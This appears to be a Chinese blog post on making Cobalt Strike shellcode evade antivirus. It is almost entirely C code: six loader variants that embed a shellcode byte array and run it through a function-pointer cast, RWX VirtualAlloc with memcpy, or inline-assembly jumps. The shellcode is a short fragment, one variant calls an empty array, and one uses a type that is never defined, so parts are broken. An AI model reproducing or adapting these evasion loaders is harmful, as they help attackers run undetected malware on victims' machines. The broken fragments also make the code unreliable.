zoukankan      html  css  js  c++  java

  • Cobalt Strike 生成shellcode免杀 楼下的小可怜

    • 生成shellcode
    • C加载实现免杀
    #include <windows.h>
#include <stdio.h>
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
unsigned char shellcode[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b"
"\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57";
void main()
{
 ((void(*)(void))&shellcode)();
}

    #include <windows.h>
#include <stdio.h>
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
unsigned char shellcode[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b"
"\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57";
void main()
{
     PVOID p = NULL;
               if((p = VirtualAlloc(NULL,sizeof(shellcode),MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE)) == NULL)
                               MessageBox(NULL,"VirtuallAlloc Failed!!!","Prompt",MB_OK);
               if(!(memcpy(p,shellcode,sizeof(shellcode))))
                               MessageBox(NULL,"WriteMemory Failed!!!","Prompt",MB_OK);
               CODE code = (CODE)p;  
               code();  
}

    #include <windows.h>
#include <stdio.h>
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
unsigned char shellcode[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b"
"\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57";
void main()
{
               __asm
               {  
                               lea eax,shellcode;  
                               jmp eax;  
               }  
}

    #include <windows.h>
#include <stdio.h>
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
unsigned char shellcode[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b"
"\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57";
void main()
{
   __asm  
               {  
                               mov eax,offset shellcode;  
                               jmp eax;
               }  
}

    #include <windows.h>
#include <stdio.h>
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
unsigned char shellcode[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b"
"\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57";
void main()
{
                __asm
               {
                               mov eax,offset shellcode;
                               _emit 0xFF;
                               _emit 0xE0;
               } 
}

    #include <windows.h>
#include <stdio.h>
unsigned char shellcode[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b"
"\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57";
unsigned char noshellcode[] = "";
void main()
{
  ((void(*)(void))&noshellcode)();
}
  • 相关阅读:
    [POJ1724]ROADS
    表达式求值
    [NOIp2017提高组]奶酪(BFS)
    [NOIp2012提高组]Vigenère 密码
    [NOIp2012提高组]国王游戏
    [POJ1321]棋盘问题
    [POJ3009]Curling2.0
    垃圾陷阱
    2019CSP day1t2 括号树
    2019CSP游记
  • 原文地址:https://www.cnblogs.com/w0x68y/p/12217039.html
Copyright © 2011-2022 走看看